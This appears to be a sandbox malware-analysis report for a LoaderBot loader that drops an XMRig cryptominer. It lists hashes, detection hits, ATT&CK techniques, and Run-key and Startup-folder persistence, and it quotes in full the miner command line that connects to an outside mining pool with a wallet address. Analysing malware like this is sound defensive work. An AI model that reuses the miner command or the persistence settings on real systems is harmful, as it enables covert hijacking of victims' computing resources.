loaderbot | 69bef682277aa8ed7ffdb645a8e41d1f1d279380cc799256132d0cac50582890

Analysis

max time kernel
150s
max time network
119s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
20-02-2024 01:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$1/1337/MinerMega.exe
Size

4.0MB
MD5

d1f8ccf271359d1d1840075b3065cdaa
SHA1

5b316201fb5d9705e20398ded7d0441962e2b183
SHA256

5817eb190e2adfb6b1a8488df5e83cda619969a4ea5cccca282a348ef35d09ad
SHA512

5fb53f967b940f76b9c98d09773bea69c6ccbfd2469b9eb64868042f2ee56860d8a000b469ce941a2241adbe261ace43273c9a6cef9821ff6eabeb8f63b81e07
SSDEEP

49152:ENDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3:SzP88fBsnZTgOtqB3m1RC3

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 2 IoCs

resource	yara_rule
behavioral5/memory/816-0-0x0000000000860000-0x0000000000C5E000-memory.dmp	loaderbot
behavioral5/memory/816-9-0x00000000069F0000-0x0000000007565000-memory.dmp	loaderbot

XMRig Miner payload 13 IoCs

miner

resource	yara_rule
behavioral5/memory/2848-12-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1140-17-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1508-23-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1584-28-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/2388-33-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1640-39-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/2868-44-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1864-50-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1864-51-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/2596-57-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/2596-58-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1808-65-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral5/memory/1696-70-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	MinerMega.exe

Executes dropped EXE 11 IoCs

pid	Process
2848	Driver.exe
1140	Driver.exe
1508	Driver.exe
1584	Driver.exe
2388	Driver.exe
1640	Driver.exe
2868	Driver.exe
1864	Driver.exe
2596	Driver.exe
1808	Driver.exe
1696	Driver.exe

Loads dropped DLL 1 IoCs

pid	Process
816	MinerMega.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\MinerMega.exe"	MinerMega.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe
816	MinerMega.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
816	MinerMega.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	816	MinerMega.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 816 wrote to memory of 2848	816	MinerMega.exe	29
PID 816 wrote to memory of 2848	816	MinerMega.exe	29
PID 816 wrote to memory of 2848	816	MinerMega.exe	29
PID 816 wrote to memory of 2848	816	MinerMega.exe	29
PID 816 wrote to memory of 1140	816	MinerMega.exe	31
PID 816 wrote to memory of 1140	816	MinerMega.exe	31
PID 816 wrote to memory of 1140	816	MinerMega.exe	31
PID 816 wrote to memory of 1140	816	MinerMega.exe	31
PID 816 wrote to memory of 1508	816	MinerMega.exe	33
PID 816 wrote to memory of 1508	816	MinerMega.exe	33
PID 816 wrote to memory of 1508	816	MinerMega.exe	33
PID 816 wrote to memory of 1508	816	MinerMega.exe	33
PID 816 wrote to memory of 1584	816	MinerMega.exe	35
PID 816 wrote to memory of 1584	816	MinerMega.exe	35
PID 816 wrote to memory of 1584	816	MinerMega.exe	35
PID 816 wrote to memory of 1584	816	MinerMega.exe	35
PID 816 wrote to memory of 2388	816	MinerMega.exe	37
PID 816 wrote to memory of 2388	816	MinerMega.exe	37
PID 816 wrote to memory of 2388	816	MinerMega.exe	37
PID 816 wrote to memory of 2388	816	MinerMega.exe	37
PID 816 wrote to memory of 1640	816	MinerMega.exe	39
PID 816 wrote to memory of 1640	816	MinerMega.exe	39
PID 816 wrote to memory of 1640	816	MinerMega.exe	39
PID 816 wrote to memory of 1640	816	MinerMega.exe	39
PID 816 wrote to memory of 2868	816	MinerMega.exe	41
PID 816 wrote to memory of 2868	816	MinerMega.exe	41
PID 816 wrote to memory of 2868	816	MinerMega.exe	41
PID 816 wrote to memory of 2868	816	MinerMega.exe	41
PID 816 wrote to memory of 1864	816	MinerMega.exe	43
PID 816 wrote to memory of 1864	816	MinerMega.exe	43
PID 816 wrote to memory of 1864	816	MinerMega.exe	43
PID 816 wrote to memory of 1864	816	MinerMega.exe	43
PID 816 wrote to memory of 2596	816	MinerMega.exe	46
PID 816 wrote to memory of 2596	816	MinerMega.exe	46
PID 816 wrote to memory of 2596	816	MinerMega.exe	46
PID 816 wrote to memory of 2596	816	MinerMega.exe	46
PID 816 wrote to memory of 1808	816	MinerMega.exe	48
PID 816 wrote to memory of 1808	816	MinerMega.exe	48
PID 816 wrote to memory of 1808	816	MinerMega.exe	48
PID 816 wrote to memory of 1808	816	MinerMega.exe	48
PID 816 wrote to memory of 1696	816	MinerMega.exe	49
PID 816 wrote to memory of 1696	816	MinerMega.exe	49
PID 816 wrote to memory of 1696	816	MinerMega.exe	49
PID 816 wrote to memory of 1696	816	MinerMega.exe	49

C:\Users\Admin\AppData\Local\Temp\$1\1337\MinerMega.exe
"C:\Users\Admin\AppData\Local\Temp\$1\1337\MinerMega.exe"
1⤵
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:816
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2848
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1140
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1508
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1584
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2388
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1640
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2868
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1864
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:2596
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1808
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 84EUKYR2H11atFNVAkBBeN2ms43rYAvFBbYJjA37BKULYfBZ7TptXP2aw6mPcBAg9yM6w27ntDcuDMq3iHJbUYPBTbuT74U -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:1696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
23KB

MD5
0d8a5653359d08d70a9bca51e5a5bf32

SHA1
d10a55b49255d34813820619127cb2e36f3a8d19

SHA256
0e7de589288e671fe15a2ae205bab3abe9d5dca8a816564dcb202382fb0e7aca

SHA512
b553b39d62024e922f0edeb79daf7f5c853111e50c588557dfdce3c945c980a58a38d0a9a95f0c6854482e2cc31582efad1fd4f3d0c87de262dcc143d39d6032

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
8KB

MD5
093df6b15b51526681d732720a8518ac

SHA1
a99cc1b662d7010535537d725e7721ef2b4a7786

SHA256
fd5d031ce87ab6c5af39858d3116d5dc43e48359b05360cf14687dded99237ba

SHA512
562e7ddb0541c3261bdd5eb67a03428eec3780588050c54f1c238d157aa58070d11394675a8a12398ad8febaf0626609c116766eacf73d6b31a5f51651665ef9

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
448KB

MD5
d4465bdbf3318f335e080f71074fa0bf

SHA1
1dd8c3e85ef13f4ce0df7c44ba5f92e0bfaa0b1d

SHA256
e24d3959f769fe7ab76b9f2f05603393b28c0897191238e56536ad2852057531

SHA512
3ac347553cc468e633a0a44a09e848e840c17a64c14f8ee3be34ea3777e7edc8943bb8b0bbe21f15a228b7fa8e5937baafca0cdb92313f848f9a5bf7560f6406

Download Submit
\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
memory/816-9-0x00000000069F0000-0x0000000007565000-memory.dmp

Filesize
11.5MB

Download
memory/816-59-0x00000000069F0000-0x0000000007565000-memory.dmp

Filesize
11.5MB

Download
memory/816-55-0x0000000000800000-0x0000000000840000-memory.dmp

Filesize
256KB

Download
memory/816-48-0x0000000074300000-0x00000000749EE000-memory.dmp

Filesize
6.9MB

Download
memory/816-0-0x0000000000860000-0x0000000000C5E000-memory.dmp

Filesize
4.0MB

Download
memory/816-4-0x0000000000800000-0x0000000000840000-memory.dmp

Filesize
256KB

Download
memory/816-1-0x0000000074300000-0x00000000749EE000-memory.dmp

Filesize
6.9MB

Download
memory/1140-17-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1508-21-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1508-23-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1584-28-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1640-38-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1640-39-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1696-70-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1808-64-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1808-65-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1864-50-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1864-51-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2388-33-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2596-71-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2596-57-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2596-58-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2848-12-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2848-11-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2848-10-0x00000000001F0000-0x0000000000204000-memory.dmp

Filesize
80KB

Download
memory/2868-44-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download